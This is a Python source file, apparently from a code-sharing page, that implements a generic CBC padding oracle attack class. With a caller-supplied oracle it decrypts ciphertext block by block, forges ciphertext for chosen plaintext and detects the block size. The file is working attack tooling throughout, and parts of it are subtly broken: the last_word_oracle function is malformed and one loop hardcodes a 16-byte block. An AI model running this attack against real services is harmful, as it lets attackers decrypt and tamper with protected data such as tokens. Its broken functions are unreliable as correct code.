123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352 |
- #!/usr/bin/python
- from base64 import b64encode, b64decode
- from copy import deepcopy
- import logging
- import random
- from functools import reduce
- import sys
- class Encoding:
- ''' Encoding Enum '''
- b64 = 1
- b64_web = 2
- hex = 3
- raw = 5
- class PaddingOracle(object):
- '''
- Generic code to attack padding oracles
- '''
- def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None):
- # setup logging - default
- self.set_verbosity(verbosity)
- # init class variables
- self.encoding = encoding
- self.oracle_func = oracle
- self.analyse_func = None
- # encode the initial ciphertext
- self.ct = self.decode(ciphertext)
- # if no BS is give, determine the BS
- if BS == None:
- self.BS = self.get_blocksize(self.ct)
- else:
- self.BS = BS
- self.num_blocks = self._ct_init()
- self.blocks = self.split_blocks(self.ct)
- self._outmode = "hex"
- # backup it_blocks and pt_blocks as dict {index:block} - for changing blocks
- self.it_blocks = {}
- self.pt_blocks = {}
- '''
- Used to decode the ciphertext, using the class variable self.encoding,
- internally the ciphertext is processed as string (bytes)
- '''
- def decode(self, ciphertext):
- if self.encoding == Encoding.b64:
- ciphertext = b64decode(ciphertext)
- elif self.encoding == Encoding.hex:
- ciphertext = ciphertext.decode('hex')
- elif self.encoding == Encoding.b64_web:
- ciphertext = b64decode(ciphertext) #TODO: adjust to b64web_decoding
- return ciphertext
- '''
- Used to encode the ciphertext, using the class variable self.encoding,
- internally the ciphertext is processed as string (bytes) but returned
- in the same fashion as the input was
- '''
- def encode(self, ciphertext):
- if self.encoding == Encoding.b64:
- ciphertext = b64encode(ciphertext)
- elif self.encoding == Encoding.hex:
- ciphertext = ciphertext.encode('hex')
- elif self.encoding == Encoding.b64_web:
- ciphertext = b64encode(ciphertext) #TODO: adjust to b64web_decoding
- return ciphertext
- '''
- simple length checks and blockcount
- '''
- def _ct_init(self):
- if len(self.ct) % self.BS != 0:
- raise Exception("[-] Length not a multiple of the BS")
- return len(self.ct) / self.BS
- '''
- splits the ciphertext in bs-large blocks
- '''
- def split_blocks(self, ct):
- return [bytearray(ct[i:i+self.BS]) for i in range(0, len(ct), self.BS)]
- '''
- merges the blocks together and return ciphertext
- '''
- def merge_blocks(self, blocks):
- out = bytearray()
- for ba in blocks:
- out.extend(ba)
- return out
- def last_word_oracle(self, y):
- r = [chr(random.randint(0x00, 0xff)) for i in range(self.BS)]
- r_b = r[-1]
- for i in range(256):
- r[-1] = chr(ord(r_b) ^ i)
- y = ''.join(r)
- # ask the oracle
- if self.oracle_func(r + y):
- # padding is 0x01
- r_b = r_b ^ i
- # for n = b down to 2
- for n in range(self.BS, 1, -1):
- r = r[self.BS-n] * r[self.BS-2]
- '''
- bool oracle(ct) - should return True if ct is correct and False if padding error
- '''
- def crack_last_block(self, blocks):
- orig_blocks = deepcopy(blocks) # deepcopy for not referencing lists...
- pt_block = [0]*self.BS # plaintext block
- it_block = [0]*self.BS # intermidiate block
- orig_pre_ct = orig_blocks[-2]
- # only assigning the lists will reference to the original blocks-list!!
- pre_ct = blocks[-2] # second to last ct block - gets modified
- last_ct = blocks[-1] # last ct block
- real_padding = self.BS
- first_run = True
- # byte_index is counting backwards in the second-to-last block
- for byte_index in range(self.BS-1, -1, -1):
- padding = self.BS - byte_index
- # gets jumped over during the first run
- if byte_index < 15:
- for prev_byte_index in range(15, byte_index, -1):
- #print("[-] Adjusting byte @ offset %d [Padding: %x]" % (prev_byte_index, padding))
- pre_ct[prev_byte_index] = it_block[prev_byte_index] ^ padding
- for guess in range(256):
- # iterate the bytes @ byte_index position
- pre_ct[byte_index] = guess
- # ask the oracle
- #if oracle(merge_blocks(blocks)) and orig_pre_ct[byte_index] != guess:
- if self.oracle_func == None:
- raise Exception("[-] No Oracle function set!")
- if self.oracle_func(self.merge_blocks(blocks)):
- if guess == orig_pre_ct[byte_index] and padding < real_padding:
- continue
- pt_block[byte_index] = guess ^ padding ^ orig_pre_ct[byte_index]
- if first_run:
- real_padding = pt_block[byte_index]
- first_run = False
- it_block[byte_index] = guess ^ padding
- logging.debug("[~] correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1} = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(hex(padding),\
- hex(guess), hex(orig_pre_ct[byte_index]), hex(it_block[byte_index]),hex(pt_block[byte_index])))
- logging.debug("[+] Plaintext Block: {}".format(pt_block))
- break
- return it_block, pt_block
- '''
- used to print the ct blocks as hexdump
- '''
- def print_ct_blocks(self):
- print("[~] ciphertext as blockwise hexdump")
- ch_arr = self.bytes_to_string(reduce(lambda x, y: x+y, [list(ba) for ba in self.blocks]))
- print(self.hexdump(ch_arr, length=self.BS))
- '''
- convert a byte-list to a string
- '''
- def bytes_to_string(self, inp):
- return "".join([chr(p) for p in inp])
- '''
- change block @ index to a new block
- '''
- def change_block(self, new_plaintext):
- if len(new_plaintext) % self.BS != 0:
- raise Exception("[-] new plaintext should be a multiple of the blocksize")
- # Startin at Block 2 (index 1)
- new_blocks = self.split_blocks(new_plaintext)
- num_new_blocks = len(new_blocks)
- local_blocks = deepcopy(self.blocks)
- local_it_blocks = deepcopy(self.it_blocks)
- if num_new_blocks > len(local_blocks):
- raise Exception("[-] Plaintext is too long")
- for idx in range(num_new_blocks-1, 0, -1):
- logging.info("[*] changing index %d" % idx)
- it_block = self.get_it_block(idx, local_blocks)
- local_blocks[idx-1] = ''.join(map(lambda xy: chr(xy[0]^xy[1]), zip(new_blocks[idx], it_block)))
- x = self.merge_blocks(local_blocks)
- # adjust all the previous blocks (iv block_0 = IV, the complete message can be changed)
- return self.encode(x)
- '''
- used to crack the block @ index
- index := {0, 1, .., .., len-1}
- '''
- def get_it_block(self, index, ct_blocks):
- if not index:
- raise Exception("[-] Cannot decrypt the first block")
- local_blocks = deepcopy(ct_blocks)
- it_block, pt_block = self.crack_last_block(local_blocks[:index+1])
- return it_block
- '''
- used to crack the block @ index
- index := {0, 1, .., .., len-1}
- '''
- def crack_block(self, index):
- if not index:
- raise Exception("[-] Cannot decrypt the first block")
- local_blocks = deepcopy(self.blocks)
- it_block, pt_block = self.crack_last_block(local_blocks[:index+1])
- self.it_blocks[index] = it_block
- self.pt_blocks[index] = pt_block
- logging.info("\n[+] decrypted block [%d]\n" %(index))
- self._output(pt_block)
- '''
- universal func. to output plaintext
- '''
- def _output(self, pt_block):
- print("-----[ Plaintext ]-----")
- if self._outmode == "hex":
- print(self.hexdump(self.bytes_to_string(pt_block)))
- elif self._outmode == "str":
- print(self.bytes_to_string(pt_block))
- '''
- set the output mode for printing the plaintext
- '''
- def set_output(self, mode):
- self._outmode = mode
- '''
- verbosity for different output
- 0 = no output
- 1 = INFO
- 2 = DEBUG
- '''
- def set_verbosity(self, level):
- levels = {
- 0:logging.WARNING,
- 1:logging.INFO,
- 2:logging.DEBUG
- }
- logging.basicConfig(format='%(message)s', level=levels.get(level, logging.INFO))
- def decrypt_block_at_index(self, index):
- logging.info("[+] Decrypting block at index %d" % index)
- self.crack_block(index)
- '''
- crack all blocks of the ciphertext (except first one)
- '''
- def decrypt_all_blocks(self):
- orig_blocks = deepcopy(self.blocks)
- local_blocks = deepcopy(self.blocks)
- num_blocks = len(self.blocks)
- pt_blocks = []
- logging.info("[+] Decrypting all %d blocks" % num_blocks)
- for idx in range(num_blocks, 1, -1):
- logging.info("[*] Decrypting block %d" %(idx))
- it_block, pt_block = self.crack_last_block(local_blocks[:idx])
- pt_blocks.append(pt_block)
- local_blocks = deepcopy(orig_blocks)
- self.it_blocks[idx-1] = it_block
- self.pt_blocks[idx-1] = pt_block
- pt_blocks = pt_blocks[::-1]
- pt = reduce(lambda x, y: x+y, pt_blocks)
- logging.info("\n[+] decrypted all the blocks\n")
- self._output(pt)
- '''
- get the blocksize via the oracle - described in 'Practical Padding Oracle Attacks', by T. Duong & J. Rizzo
- Works like following:
- '''
- def get_blocksize(self, ciphertext):
- if self.oracle_func == None:
- raise Exception('Error: Not oracle set!')
- if len(ciphertext) % 16 == 8:
- return 8
- c = ciphertext[-16:]
- if self.oracle_func(ciphertext + c) == True:
- return 8
- return 16
- def hexdump(self, src, length=16):
- ''' https://gist.github.com/sbz/1080258 '''
- src = str(src)
- FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
- lines = []
- for c in range(0, len(src), length):
- chars = src[c:c+length]
- hex = ' '.join(["%02x" % ord(x) for x in chars])
- printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
- lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable))
- return ''.join(lines)
|